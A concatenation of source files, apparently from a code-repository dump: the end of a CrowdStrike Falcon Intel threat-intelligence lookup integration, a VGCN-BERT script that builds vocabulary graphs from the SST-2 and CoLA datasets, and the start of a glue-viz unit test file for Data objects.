region = r.get('region', {}).get('value')
kill_chain = r.get('kill_chain')
output: Dict[str, Any] = assign_params(**{
'ImageURL': image_url,
'Name': name,
'ID': actor_id,
'URL': url,
'Slug': slug,
'ShortDescription': short_description,
'FirstActivityDate': datetime.fromtimestamp(first_activity_date, timezone.utc).isoformat()
if first_activity_date else None,
'LastActivityDate': datetime.fromtimestamp(last_activity_date, timezone.utc).isoformat()
if last_activity_date else None,
'Active': active,
'KnownAs': known_as,
'TargetIndustries': get_values(target_industries, return_type='list'),
'TargetCountries': get_values(target_countries, return_type='list'),
'Origins': get_values(origins, return_type='list'),
'Motivations': get_values(motivations, return_type='list'),
'Capability': capability,
'Group': group,
'Region': region,
'KillChains': kill_chain
})
outputs.append(output)
md_output: Dict[str, Any] = output
for key in ('URL', 'ImageURL'):
if key in md_output:
value = md_output[key]
md_output[key] = f'[{value}]({value})'
md_outputs.append(md_output)
else:
md = 'No actors found.'
results: CommandResults = CommandResults(
outputs=outputs,
outputs_key_field='ID',
outputs_prefix='FalconIntel.Actor',
readable_output=md if md else tableToMarkdown(name=title, t=md_outputs, headerTransform=pascalToSpace),
raw_response=res
)
return results
def cs_indicators_command(client: Client, args: Dict[str, str]) -> List[CommandResults]:
res: Dict[str, Any] = client.cs_indicators(args)
resources: List[Any] = res.get('resources', [])
results: List[CommandResults] = []
title: str = 'Falcon Intel Indicator search:'
if resources:
for r in resources:
output = get_indicator_outputs(r)
indicator_value = output.get('Value')
indicator_type = output.get('Type')
indicator: Optional[Common.Indicator] = None
if indicator_type in ('hash_md5', 'hash_sha256', 'hash_sha1', 'ip_address', 'url', 'domain'):
if indicator_type in ('hash_md5', 'hash_sha1', 'hash_sha256'):
indicator_type = 'hash'
elif indicator_type == 'ip_address':
indicator_type = 'ip'
score = get_score_from_resource(r)
dbot_score = Common.DBotScore(
indicator=indicator_value,
indicator_type=get_dbot_score_type(indicator_type),
integration_name='CrowdStrike Falcon Intel v2',
malicious_description='High confidence',
score=score,
reliability=client.reliability
)
indicator = get_indicator_object(indicator_value, indicator_type, dbot_score)
results.append(CommandResults(
outputs=output,
outputs_prefix='FalconIntel.Indicator',
outputs_key_field='ID',
readable_output=tableToMarkdown(name=title, t=output, headerTransform=pascalToSpace),
raw_response=res,
indicator=indicator
))
else:
results.append(CommandResults(
readable_output='No indicators found.'
))
return results
def cs_reports_command(client: Client, args: Dict[str, str]) -> CommandResults:
res: Dict[str, Any] = client.cs_reports(args)
resources: List[Any] = res.get('resources', [])
outputs: List[Dict[str, Any]] = list()
md_outputs: List[Dict[str, Any]] = list()
md: str = str()
title: str = 'Falcon Intel Report search:'
if resources:
for r in resources:
report_id: int = r.get('id')
url: str = r.get('url')
name: str = r.get('name')
report_type: str = r.get('type', {}).get('name')
sub_type: str = r.get('sub_type', {}).get('name')
slug: str = r.get('slug')
created_date: int = r.get('created_date')
last_modified_date: int = r.get('last_modified_date')
short_description: str = r.get('short_description')
target_industries: List[Any] = r.get('target_industries', [])
target_countries: List[Any] = r.get('target_countries', [])
motivations: List[Any] = r.get('motivations', [])
tags: List[Any] = r.get('tags', [])
actors: List[Any] = r.get('actors', [])
output: Dict[str, Any] = assign_params(**{
'ID': report_id,
'URL': url,
'Name': name,
'Type': report_type,
'SubType': sub_type,
'Slug': slug,
'CreatedDate': datetime.fromtimestamp(created_date, timezone.utc).isoformat()
if created_date else None,
'LastModifiedSate': datetime.fromtimestamp(last_modified_date, timezone.utc).isoformat()
if last_modified_date else None,
'ShortDescription': short_description,
'TargetIndustries': get_values(target_industries, return_type='list'),
'TargetCountries': get_values(target_countries, return_type='list'),
'Motivations': get_values(motivations, return_type='list'),
'Tags': get_values(tags, return_type='list'),
'Actors': get_values(actors, return_type='list', keys='name')
})
outputs.append(output)
md_output: Dict[str, Any] = output
if 'URL' in md_output:
value = md_output['URL']
md_output['URL'] = f'[{value}]({value})'
md_outputs.append(md_output)
else:
md = 'No reports found.'
results: CommandResults = CommandResults(
outputs_prefix='FalconIntel.Report',
outputs=outputs,
outputs_key_field='ID',
readable_output=md if md else tableToMarkdown(name=title, t=outputs, headerTransform=pascalToSpace),
raw_response=res
)
return results
def main():
params: Dict[str, str] = demisto.params()
reliability = params.get('integrationReliability', 'C - Fairly reliable')
reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) if \
DBotScoreReliability.is_valid_type(reliability) else None
args: Dict[str, str] = demisto.args()
results: Union[CommandResults, List[CommandResults]]
try:
command: str = demisto.command()
LOG(f'Command being called in CrowdStrike Falcon Intel v2 is: {command}')
client: Client = Client(params=params, reliability=reliability)
if command == 'test-module':
result: Union[str, Exception] = run_test_module(client)
return_results(result)
elif command == 'file':
results = file_command(argToList(args['file']), client)
return_results(results)
elif command == 'ip':
results = ip_command(argToList(args['ip']), client)
return_results(results)
elif command == 'url':
results = url_command(argToList(args['url']), client)
return_results(results)
elif command == 'domain':
results = domain_command(argToList(args['domain']), client)
return_results(results)
elif command == 'cs-actors':
results = cs_actors_command(client, args)
return_results(results)
elif command == 'cs-indicators':
results = cs_indicators_command(client, args)
return_results(results)
elif command == 'cs-reports':
results = cs_reports_command(client, args)
return_results(results)
else:
raise NotImplementedError(f'{command} command is not an existing CrowdStrike Falcon Intel v2 integration')
except Exception as err:
return_error(f'Unexpected error:\n{str(err)}', error=traceback.format_exc())
from CrowdStrikeApiModule import * # noqa: E402
if __name__ in ('__main__', 'builtin', 'builtins'):
main()
|
df968a1d81f0664eb73e4516ccc29408cdff3a17
|
7dc91600571f5f8985dbc86b3e0396ee681af477
|
/vgcn_bert/prepare_data.py
|
6408a379f72e1718a4d66b9c28eb2626bc0b7c63
|
[
"MIT"
] |
permissive
|
Louis-udm/VGCN-BERT
|
e27531d37c42740c5172b698474bd1426afddcb6
|
6d2edd3161f0881d074029e60aaab69b8fc2ca75
|
refs/heads/master
| 2023-07-13T03:29:10.130148
| 2023-07-03T14:43:18
| 2023-07-03T14:43:18
| 235,446,882
| 124
| 40
|
MIT
| 2021-05-04T05:10:20
| 2020-01-21T21:39:11
|
Python
|
UTF-8
|
Python
| false
| false
| 18,368
|
py
|
prepare_data.py
|
# -*- coding: utf-8 -*-
# @author Zhibin.LU
# @website: https://github.com/Louis-udm
"""pre-process data and prepare the vocabulary graph"""
import argparse
import os
import pickle as pkl
import random
import re
import sys
import time
import nltk
import numpy as np
import pandas as pd
import scipy.sparse as sp
from nltk.corpus import stopwords
from sklearn.utils import shuffle
from vgcn_bert.env_config import env_config
from vgcn_bert.utils import clean_str, del_http_user_tokenize
random.seed(env_config.GLOBAL_SEED)
np.random.seed(env_config.GLOBAL_SEED)
# import torch
# cuda_yes = torch.cuda.is_available()
# device = torch.device("cuda:0" if cuda_yes else "cpu")
# torch.manual_seed(44)
# if cuda_yes:
# torch.cuda.manual_seed_all(44)
"""
Config:
"""
parser = argparse.ArgumentParser()
parser.add_argument("--ds", type=str, default="cola")
parser.add_argument("--sw", type=int, default=0)
args = parser.parse_args()
cfg_ds = args.ds
cfg_del_stop_words = True if args.sw == 1 else False
dataset_list = {"sst", "cola"}
if cfg_ds not in dataset_list:
sys.exit("Dataset choice error!")
will_dump_objects = True
dump_dir = f"data/preprocessed/{cfg_ds}/"
if not os.path.exists(dump_dir):
os.makedirs(dump_dir)
if cfg_del_stop_words:
freq_min_for_word_choice = 5
# freq_min_for_word_choice=10 #best
else:
freq_min_for_word_choice = 1 # for bert+
valid_data_taux = 0.05
test_data_taux = 0.10
# word co-occurence with context windows
window_size = 20
if cfg_ds in ("mr", "sst", "cola"):
window_size = 1000 # use whole sentence
tfidf_mode = "only_tf"
# tfidf_mode='all_tfidf'
# 在clean doc时是否使用bert_tokenizer分词, data3时不用更好
cfg_use_bert_tokenizer_at_clean = True
# bert_model_scale='bert-large-uncased'
bert_model_scale = "bert-base-uncased"
if env_config.TRANSFORMERS_OFFLINE == 1:
bert_model_scale = os.path.join(
env_config.HUGGING_LOCAL_MODEL_FILES_PATH,
f"hf-maintainers_{bert_model_scale}",
)
bert_lower_case = True
print("---data prepare configure---")
print(
f"Data set: {cfg_ds}",
f"freq_min_for_word_choice {freq_min_for_word_choice}",
f"window_size {window_size}",
)
print(
f"del_stop_words {cfg_del_stop_words}",
f"use_bert_tokenizer_at_clean {cfg_use_bert_tokenizer_at_clean}",
)
print(
f"tfidf-mode {tfidf_mode}",
f"bert_model_scale {bert_model_scale}",
f"bert_lower_case {bert_lower_case}",
)
print("\n")
"""
Get the tweets,y,confidence etc from data file
"""
print("Get the tweets,y,confidence etc from data file...")
start = time.time()
if cfg_ds == "sst":
from get_sst_data import DataReader
train, valid, test = DataReader(
"data/SST-2/train.txt", "./data/SST-2/dev.txt", "./data/SST-2/test.txt"
).read()
random.shuffle(train)
random.shuffle(valid)
random.shuffle(test)
train_size = len(train)
valid_size = len(valid)
test_size = len(test)
print(
"SST-2, train_szie:%d, valid_size:%d, test_size:%d"
% (train_size, valid_size, test_size)
)
trainset = {}
validset = {}
testset = {}
for data, dataset in [
(train, trainset),
(valid, validset),
(test, testset),
]:
label = []
all_text = []
for line in data:
label.append(line[0])
all_text.append(line[1])
dataset["label"] = label
dataset["data"] = all_text
label2idx = {label: i for i, label in enumerate(testset["label"])}
idx2label = {i: label for i, label in enumerate(testset["label"])}
corpus = trainset["data"] + validset["data"] + testset["data"]
y = np.array(trainset["label"] + validset["label"] + testset["label"])
corpus_size = len(corpus)
y_prob = np.eye(corpus_size, len(label2idx))[y]
elif cfg_ds == "cola":
label2idx = {"0": 0, "1": 1}
idx2label = {0: "0", 1: "1"}
train_valid_df = pd.read_csv(
"data/CoLA/train.tsv", encoding="utf-8", header=None, sep="\t"
)
train_valid_df = shuffle(train_valid_df)
# use dev set as test set, because we can not get the ground true label of the real test set.
test_df = pd.read_csv(
"data/CoLA/dev.tsv", encoding="utf-8", header=None, sep="\t"
)
test_df = shuffle(test_df)
train_valid_size = train_valid_df[1].count()
valid_size = int(train_valid_size * valid_data_taux)
train_size = train_valid_size - valid_size
test_size = test_df[1].count()
print(
"CoLA train_valid Total:", train_valid_size, "test Total:", test_size
)
df = pd.concat((train_valid_df, test_df))
corpus = df[3]
y = df[1].values # y.as_matrix()
# 获得confidence
y_prob = np.eye(len(y), len(label2idx))[y]
corpus_size = len(y)
doc_content_list = []
for t in corpus:
doc_content_list.append(del_http_user_tokenize(t))
max_len_seq = 0
max_len_seq_idx = -1
min_len_seq = 1000
min_len_seq_idx = -1
sen_len_list = []
for i, seq in enumerate(doc_content_list):
seq = seq.split()
sen_len_list.append(len(seq))
if len(seq) < min_len_seq:
min_len_seq = len(seq)
min_len_seq_idx = i
if len(seq) > max_len_seq:
max_len_seq = len(seq)
max_len_seq_idx = i
print(
"Statistics for original text: max_len%d,id%d, min_len%d,id%d, avg_len%.2f"
% (
max_len_seq,
max_len_seq_idx,
min_len_seq,
min_len_seq_idx,
np.array(sen_len_list).mean(),
)
)
"""
Remove stop words from tweets
"""
print("Remove stop words from tweets...")
if cfg_del_stop_words:
from nltk.corpus import stopwords
nltk.download("stopwords")
stop_words = stopwords.words("english")
stop_words = set(stop_words)
else:
stop_words = {}
print("Stop_words:", stop_words)
tmp_word_freq = {} # to remove rare words
new_doc_content_list = []
# use bert_tokenizer for split the sentence
if cfg_use_bert_tokenizer_at_clean:
print("Use bert_tokenizer for seperate words to bert vocab")
from pytorch_pretrained_bert import ( # for Huggingface transformer 0.6.2)
BertTokenizer,
)
# from transformers import BertTokenizer
bert_tokenizer = BertTokenizer.from_pretrained(
bert_model_scale, do_lower_case=bert_lower_case
)
for doc_content in doc_content_list:
new_doc = clean_str(doc_content)
if cfg_use_bert_tokenizer_at_clean:
sub_words = bert_tokenizer.tokenize(new_doc)
sub_doc = " ".join(sub_words).strip()
new_doc = sub_doc
new_doc_content_list.append(new_doc)
for word in new_doc.split():
if word in tmp_word_freq:
tmp_word_freq[word] += 1
else:
tmp_word_freq[word] = 1
doc_content_list = new_doc_content_list
# for normal dataset
clean_docs = []
count_void_doc = 0
for i, doc_content in enumerate(doc_content_list):
words = doc_content.split()
doc_words = []
for word in words:
# if tmp_word_freq[word] >= freq_min_for_word_choice:
if cfg_ds in ("mr", "sst", "cola"):
doc_words.append(word)
elif (
word not in stop_words
and tmp_word_freq[word] >= freq_min_for_word_choice
):
doc_words.append(word)
doc_str = " ".join(doc_words).strip()
if doc_str == "":
count_void_doc += 1
# doc_str = '[unk]'
# doc_str = 'normal'
# doc_str = doc_content
print(
f"No. {i}",
"is a empty doc after treat, replaced by '%s'. original:%s"
% (doc_str, doc_content),
)
clean_docs.append(doc_str)
print("Total", count_void_doc, " docs are empty.")
min_len = 10000
min_len_id = -1
max_len = 0
max_len_id = -1
aver_len = 0
for i, line in enumerate(clean_docs):
temp = line.strip().split()
aver_len = aver_len + len(temp)
if len(temp) < min_len:
min_len = len(temp)
min_len_id = i
if len(temp) > max_len:
max_len = len(temp)
max_len_id = i
aver_len = 1.0 * aver_len / len(clean_docs)
print("After tokenizer:")
print("Min_len : " + str(min_len) + " id: " + str(min_len_id))
print("Max_len : " + str(max_len) + " id: " + str(max_len_id))
print("Average_len : " + str(aver_len))
"""
Build graph
"""
print("Build graph...")
if cfg_ds in ("mr", "sst", "cola"):
shuffled_clean_docs = clean_docs
train_docs = shuffled_clean_docs[:train_size]
valid_docs = shuffled_clean_docs[train_size : train_size + valid_size]
train_valid_docs = shuffled_clean_docs[: train_size + valid_size]
train_y = y[:train_size]
valid_y = y[train_size : train_size + valid_size]
test_y = y[train_size + valid_size :]
train_y_prob = y_prob[:train_size]
valid_y_prob = y_prob[train_size : train_size + valid_size]
test_y_prob = y_prob[train_size + valid_size :]
# build vocab using whole corpus(train+valid+test+genelization)
word_set = set()
for doc_words in shuffled_clean_docs:
words = doc_words.split()
for word in words:
word_set.add(word)
# if word in word_freq:
# word_freq[word] += 1
# else:
# word_freq[word] = 1
vocab = list(word_set)
vocab_size = len(vocab)
vocab_map = {}
for i in range(vocab_size):
vocab_map[vocab[i]] = i
# build vocab_train_valid
word_set_train_valid = set()
for doc_words in train_valid_docs:
words = doc_words.split()
for word in words:
word_set_train_valid.add(word)
vocab_train_valid = list(word_set_train_valid)
vocab_train_valid_size = len(vocab_train_valid)
# a map for word -> doc_list
if tfidf_mode == "all_tf_train_valid_idf":
for_idf_docs = train_valid_docs
else:
for_idf_docs = shuffled_clean_docs
word_doc_list = {}
for i in range(len(for_idf_docs)):
doc_words = for_idf_docs[i]
words = doc_words.split()
appeared = set()
for word in words:
if word in appeared:
continue
if word in word_doc_list:
doc_list = word_doc_list[word]
doc_list.append(i)
word_doc_list[word] = doc_list
else:
word_doc_list[word] = [i]
appeared.add(word)
word_doc_freq = {}
for word, doc_list in word_doc_list.items():
word_doc_freq[word] = len(doc_list)
"""
Doc word heterogeneous graph
and Vocabulary graph
"""
print(
"Calculate First isomerous adj and First isomorphic vocab adj, get word-word PMI values"
)
adj_y = np.hstack((train_y, np.zeros(vocab_size), valid_y, test_y))
adj_y_prob = np.vstack(
(
train_y_prob,
np.zeros((vocab_size, len(label2idx)), dtype=np.float32),
valid_y_prob,
test_y_prob,
)
)
windows = []
for doc_words in train_valid_docs:
words = doc_words.split()
length = len(words)
if length <= window_size:
windows.append(words)
else:
for j in range(length - window_size + 1):
window = words[j : j + window_size]
windows.append(window)
print(
"Train_valid size:", len(train_valid_docs), "Window number:", len(windows)
)
word_window_freq = {}
for window in windows:
appeared = set()
for i in range(len(window)):
if window[i] in appeared:
continue
if window[i] in word_window_freq:
word_window_freq[window[i]] += 1
else:
word_window_freq[window[i]] = 1
appeared.add(window[i])
word_pair_count = {}
for window in windows:
appeared = set()
for i in range(1, len(window)):
for j in range(0, i):
word_i = window[i]
word_i_id = vocab_map[word_i]
word_j = window[j]
word_j_id = vocab_map[word_j]
if word_i_id == word_j_id:
continue
word_pair_str = str(word_i_id) + "," + str(word_j_id)
if word_pair_str in appeared:
continue
if word_pair_str in word_pair_count:
word_pair_count[word_pair_str] += 1
else:
word_pair_count[word_pair_str] = 1
appeared.add(word_pair_str)
# two orders
word_pair_str = str(word_j_id) + "," + str(word_i_id)
if word_pair_str in appeared:
continue
if word_pair_str in word_pair_count:
word_pair_count[word_pair_str] += 1
else:
word_pair_count[word_pair_str] = 1
appeared.add(word_pair_str)
from math import log
row = []
col = []
weight = []
tfidf_row = []
tfidf_col = []
tfidf_weight = []
vocab_adj_row = []
vocab_adj_col = []
vocab_adj_weight = []
num_window = len(windows)
tmp_max_npmi = 0
tmp_min_npmi = 0
tmp_max_pmi = 0
tmp_min_pmi = 0
for key in word_pair_count:
temp = key.split(",")
i = int(temp[0])
j = int(temp[1])
count = word_pair_count[key]
word_freq_i = word_window_freq[vocab[i]]
word_freq_j = word_window_freq[vocab[j]]
pmi = log(
(1.0 * count / num_window)
/ (1.0 * word_freq_i * word_freq_j / (num_window * num_window))
)
# 使用normalized pmi:
npmi = (
log(1.0 * word_freq_i * word_freq_j / (num_window * num_window))
/ log(1.0 * count / num_window)
- 1
)
if npmi > tmp_max_npmi:
tmp_max_npmi = npmi
if npmi < tmp_min_npmi:
tmp_min_npmi = npmi
if pmi > tmp_max_pmi:
tmp_max_pmi = pmi
if pmi < tmp_min_pmi:
tmp_min_pmi = pmi
if pmi > 0:
row.append(train_size + i)
col.append(train_size + j)
weight.append(pmi)
if npmi > 0:
vocab_adj_row.append(i)
vocab_adj_col.append(j)
vocab_adj_weight.append(npmi)
print("max_pmi:", tmp_max_pmi, "min_pmi:", tmp_min_pmi)
print("max_npmi:", tmp_max_npmi, "min_npmi:", tmp_min_npmi)
print("Calculate doc-word tf-idf weight")
n_docs = len(shuffled_clean_docs)
doc_word_freq = {}
for doc_id in range(n_docs):
doc_words = shuffled_clean_docs[doc_id]
words = doc_words.split()
for word in words:
word_id = vocab_map[word]
doc_word_str = str(doc_id) + "," + str(word_id)
if doc_word_str in doc_word_freq:
doc_word_freq[doc_word_str] += 1
else:
doc_word_freq[doc_word_str] = 1
for i in range(n_docs):
doc_words = shuffled_clean_docs[i]
words = doc_words.split()
doc_word_set = set()
tfidf_vec = []
for word in words:
if word in doc_word_set:
continue
j = vocab_map[word]
key = str(i) + "," + str(j)
tf = doc_word_freq[key]
tfidf_row.append(i)
if i < train_size:
row.append(i)
else:
row.append(i + vocab_size)
tfidf_col.append(j)
col.append(train_size + j)
# smooth
idf = log((1.0 + n_docs) / (1.0 + word_doc_freq[vocab[j]])) + 1.0
# weight.append(tf * idf)
if tfidf_mode == "only_tf":
tfidf_vec.append(tf)
else:
tfidf_vec.append(tf * idf)
doc_word_set.add(word)
if len(tfidf_vec) > 0:
weight.extend(tfidf_vec)
tfidf_weight.extend(tfidf_vec)
"""
Assemble adjacency matrix and dump to files
"""
node_size = vocab_size + corpus_size
adj_list = []
adj_list.append(
sp.csr_matrix(
(weight, (row, col)), shape=(node_size, node_size), dtype=np.float32
)
)
for i, adj in enumerate(adj_list):
adj_list[i] = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)
adj_list[i].setdiag(1.0)
vocab_adj = sp.csr_matrix(
(vocab_adj_weight, (vocab_adj_row, vocab_adj_col)),
shape=(vocab_size, vocab_size),
dtype=np.float32,
)
vocab_adj.setdiag(1.0)
print("Calculate isomorphic vocab adjacency matrix using doc's tf-idf...")
tfidf_all = sp.csr_matrix(
(tfidf_weight, (tfidf_row, tfidf_col)),
shape=(corpus_size, vocab_size),
dtype=np.float32,
)
tfidf_train = tfidf_all[:train_size]
tfidf_valid = tfidf_all[train_size : train_size + valid_size]
tfidf_test = tfidf_all[train_size + valid_size :]
tfidf_X_list = [tfidf_train, tfidf_valid, tfidf_test]
vocab_tfidf = tfidf_all.T.tolil()
for i in range(vocab_size):
norm = np.linalg.norm(vocab_tfidf.data[i])
if norm > 0:
vocab_tfidf.data[i] = (vocab_tfidf.data[i] / norm).tolist()
vocab_adj_tf = vocab_tfidf.dot(vocab_tfidf.T)
# check
print("Check adjacent matrix...")
for k in range(len(adj_list)):
count = 0
for i in range(adj_list[k].shape[0]):
if adj_list[k][i, i] <= 0:
count += 1
print("No.%d adj, abnomal diagonal found, No.%d" % (k, i))
if count > 0:
print("No.%d adj, totoal %d zero diagonal found." % (k, count))
# dump objects
if will_dump_objects:
print("Dump objects...")
with open(dump_dir + "/data_%s.labels" % cfg_ds, "wb") as f:
pkl.dump([label2idx, idx2label], f)
with open(dump_dir + "/data_%s.vocab_map" % cfg_ds, "wb") as f:
pkl.dump(vocab_map, f)
with open(dump_dir + "/data_%s.vocab" % cfg_ds, "wb") as f:
pkl.dump(vocab, f)
with open(dump_dir + "/data_%s.adj_list" % cfg_ds, "wb") as f:
pkl.dump(adj_list, f)
with open(dump_dir + "/data_%s.y" % cfg_ds, "wb") as f:
pkl.dump(y, f)
with open(dump_dir + "/data_%s.y_prob" % cfg_ds, "wb") as f:
pkl.dump(y_prob, f)
with open(dump_dir + "/data_%s.train_y" % cfg_ds, "wb") as f:
pkl.dump(train_y, f)
with open(dump_dir + "/data_%s.train_y_prob" % cfg_ds, "wb") as f:
pkl.dump(train_y_prob, f)
with open(dump_dir + "/data_%s.valid_y" % cfg_ds, "wb") as f:
pkl.dump(valid_y, f)
with open(dump_dir + "/data_%s.valid_y_prob" % cfg_ds, "wb") as f:
pkl.dump(valid_y_prob, f)
with open(dump_dir + "/data_%s.test_y" % cfg_ds, "wb") as f:
pkl.dump(test_y, f)
with open(dump_dir + "/data_%s.test_y_prob" % cfg_ds, "wb") as f:
pkl.dump(test_y_prob, f)
with open(dump_dir + "/data_%s.tfidf_list" % cfg_ds, "wb") as f:
pkl.dump(tfidf_X_list, f)
with open(dump_dir + "/data_%s.vocab_adj_pmi" % (cfg_ds), "wb") as f:
pkl.dump(vocab_adj, f)
with open(dump_dir + "/data_%s.vocab_adj_tf" % (cfg_ds), "wb") as f:
pkl.dump(vocab_adj_tf, f)
with open(dump_dir + "/data_%s.shuffled_clean_docs" % cfg_ds, "wb") as f:
pkl.dump(shuffled_clean_docs, f)
print("Data prepared, spend %.2f s" % (time.time() - start))
|
b0233d3f3c258f3055f9a5d4b537c40b0cc1fd91
|
ce1c91c33d9b612e97361527e5a974996208c90d
|
/glue/core/tests/test_data.py
|
b20382da3f00dae5d13b31aeb53004fa6e91dca8
|
[
"BSD-3-Clause"
] |
permissive
|
glue-viz/glue
|
5f52faaf91e1ca4822d3983b6a4b9b60e8807f38
|
1a5c7676c025a1a025068b806f6f90ed53bba543
|
refs/heads/main
| 2023-09-04T09:24:00.519833
| 2023-08-17T09:40:04
| 2023-08-17T09:40:04
| 1,768,238
| 609
| 149
|
NOASSERTION
| 2023-09-13T20:56:14
| 2011-05-18T20:58:54
|
Python
|
UTF-8
|
Python
| false
| false
| 39,767
|
py
|
test_data.py
|
# pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103,R0903,R0904
import pytest
import numpy as np
from numpy.testing import assert_equal, assert_allclose
from unittest.mock import MagicMock
from astropy.utils import NumpyRNGContext
from glue import core
from ..component import Component, DerivedComponent, CategoricalComponent, DateTimeComponent
from ..component_id import ComponentID
from ..component_link import ComponentLink, CoordinateComponentLink, BinaryComponentLink
from ..coordinates import Coordinates, IdentityCoordinates
from ..data import Data, pixel_label
from ..link_helpers import LinkSame
from ..data_collection import DataCollection
from ..exceptions import IncompatibleAttribute
from ..hub import Hub
from ..registry import Registry
from ..subset import (Subset, CategoricalROISubsetState, SubsetState,
RoiSubsetState, RangeSubsetState, SliceSubsetState,
CategoricalMultiRangeSubsetState, MaskSubsetState,
CategoricalROISubsetState2D, AndState, roi_to_subset_state)
from ..roi import PolygonalROI, CategoricalROI, RangeROI, RectangularROI
from .test_state import clone
class _TestCoordinates(Coordinates):
def __init__(self):
super().__init__(pixel_n_dim=2, world_n_dim=2)
def pixel_to_world_values(self, *args):
return [(i + 2.) * a for i, a in enumerate(args)]
def world_to_pixel_values(self, *args):
return [a / (i + 2.) for i, a in enumerate(args)]
class TestData(object):
def setup_method(self, method):
self.data = Data(label="Test Data")
Registry().clear()
comp = Component(np.random.random((2, 3)))
self.comp = comp
self.data.coords = _TestCoordinates()
self.comp_id = self.data.add_component(comp, 'Test Component')
def test_2d_component_print(self):
assert str(self.comp) == 'Component with shape (2, 3)'
def test_shape_empty(self):
d = Data()
assert d.shape == ()
def test_ndim_empty(self):
d = Data()
assert d.ndim == 0
def test_shape(self):
assert self.data.shape == (2, 3)
def test_ndim(self):
assert self.data.ndim == 2
def test_size(self):
assert self.data.size == 6
def test_label(self):
d = Data()
assert d.label == ''
assert self.data.label == "Test Data"
def test_set_label(self):
d = Data()
d.label = 'test_set_label'
assert d.label == 'test_set_label'
def test_add_component_with_id(self):
cid = ComponentID("test")
comp = Component(np.random.random((2, 3)))
cid2 = self.data.add_component(comp, cid)
assert cid2 is cid
def test_add_component_via_setitem(self):
d = Data(x=[1, 2, 3])
d['y'] = d['x'] * 2
np.testing.assert_array_equal(d['y'], [2, 4, 6])
def test_add_component_incompatible_shape(self):
comp = MagicMock()
comp.data.shape = (3, 2)
with pytest.raises(TypeError) as exc:
self.data.add_component(comp("junk label"))
assert exc.value.args[0].endswith("add_component() missing 1 required "
"positional argument: 'label'")
def test_get_getitem_incompatible_attribute(self):
cid = ComponentID('bad')
with pytest.raises(IncompatibleAttribute) as exc:
self.data.__getitem__(cid)
assert exc.value.args[0] is cid
def test_get_component_incompatible_attribute(self):
cid = ComponentID('bad')
with pytest.raises(IncompatibleAttribute) as exc:
self.data.get_component(cid)
assert exc.value.args[0] is cid
def test_get_component_name(self):
d = Data(x=[1, 2, 3])
assert isinstance(d.get_component('x'), Component)
def test_component_ids(self):
cid = self.data.component_ids()
assert self.comp_id in cid
def test_new_subset(self):
sub = self.data.new_subset()
assert sub in self.data.subsets
def test_data_not_created_with_subsets(self):
assert len(self.data.subsets) == 0
def test_register(self):
hub = MagicMock(spec_set=Hub)
self.data.register_to_hub(hub)
assert hub is self.data.hub
def test_component_order(self):
"""Components should be returned in the order they were specified"""
data = Data()
comp = Component(np.array([1, 2, 3]))
labels = 'asldfkjaAREGWoibasiwnsldkgajsldkgslkg'
for label in labels:
data.add_component(comp, label)
ids = data.main_components
assert [cid.label for cid in ids] == list(labels)
def test_broadcast(self):
hub = MagicMock(spec_set=Hub)
# make sure broadcasting with no hub is ok
self.data.broadcast('testing')
# make sure broadcast with hub gets relayed
self.data.register_to_hub(hub)
self.data.broadcast('testing')
assert hub.broadcast.call_count == 1
def test_double_hub_add(self):
hub = MagicMock(spec_set=Hub)
hub2 = MagicMock(spec_set=Hub)
self.data.register_to_hub(hub)
with pytest.raises(AttributeError) as exc:
self.data.__setattr__('hub', hub2)
assert exc.value.args[0] == ("Data has already been assigned "
"to a different hub")
def test_main_components(self):
compid = ComponentID('virtual')
link = MagicMock(spec_set=ComponentLink)
comp = DerivedComponent(self.data, link)
self.data.add_component(comp, compid)
main_comps = self.data.main_components
assert self.comp_id in main_comps
assert compid not in main_comps
def test_add_component_invalid_component(self):
comp = Component(np.array([1]))
with pytest.raises(ValueError) as exc:
self.data.add_component(comp, label='bad')
assert exc.value.args[0].startswith("The dimensions of component bad")
def test_add_component_link(self):
link = MagicMock(spec_set=ComponentLink)
cid = ComponentID("new id")
link.get_to_id.return_value = cid
self.data.add_component_link(link)
assert cid in self.data.derived_components
def test_derived_components(self):
compid = ComponentID('virtual')
link = MagicMock(spec_set=ComponentLink)
comp = DerivedComponent(self.data, link)
self.data.add_component(comp, compid)
pricomps = self.data.derived_components
assert self.comp_id not in pricomps
assert compid in pricomps
def test_str_empty(self):
d = Data()
str(d)
def test_str_(self):
str(self.data)
def test_add_derived_component(self):
compid = ComponentID('virtual')
link = MagicMock(spec_set=ComponentLink)
comp = DerivedComponent(self.data, link)
comp.data.shape = self.data.shape
self.data.add_component(comp, compid)
result = self.data[compid]
link.compute.assert_called_with(self.data)
def test_find_component_id(self):
cid = self.data.find_component_id('Test Component')
assert cid == self.comp_id
assert self.data.find_component_id('does not exist') is None
def test_add_subset(self):
s = Subset(Data())
self.data.add_subset(s)
assert s in self.data.subsets
def test_add_subset_with_subset_state(self):
"""Passing a subset state auto-wraps into a subset object"""
state = SubsetState()
self.data.add_subset(state)
added = self.data.subsets[-1]
assert added.subset_state is state
assert added.data is self.data
def test_add_subset_reparents_subset(self):
"""add_subset method updates subset.data reference"""
s = Subset(None)
self.data.add_subset(s)
assert s.data is self.data
def test_add_subset_disambiguates_label(self):
"""adding subset should disambiguate label if needed"""
s1 = Subset(None)
self.data.add_subset(s1)
s1.label = "test_subset_label"
s2 = Subset(None)
s2.label = "test_subset_label"
assert s2.label == "test_subset_label"
self.data.add_subset(s2)
assert s2.label != "test_subset_label"
def test_add_subset_with_hub(self):
s = Subset(None)
hub = MagicMock(spec_set=Hub)
self.data.register_to_hub(hub)
self.data.add_subset(s)
assert s in self.data.subsets
assert hub.broadcast.call_count == 1
def test_remove_component(self):
hub = MagicMock(spec_set=Hub)
self.data.register_to_hub(hub)
self.data.remove_component(self.comp_id)
assert self.comp_id not in self.data.components
assert hub.broadcast.call_count == 2
def test_get_component(self):
assert self.data.get_component(self.comp_id) is self.comp
def test_get_None_component(self):
with pytest.raises(IncompatibleAttribute):
self.data.get_component(None)
def test_get_item(self):
assert self.data[self.comp_id] is self.comp.data
def test_coordinate_links(self):
links = self.data.coordinate_links
w0 = self.data[self.data.world_component_ids[0]]
w1 = self.data[self.data.world_component_ids[1]]
p0 = self.data[self.data.pixel_component_ids[0]]
p1 = self.data[self.data.pixel_component_ids[1]]
w0prime = links[0].compute(self.data)
p0prime = links[1].compute(self.data)
w1prime = links[2].compute(self.data)
p1prime = links[3].compute(self.data)
np.testing.assert_array_equal(w0, w0prime)
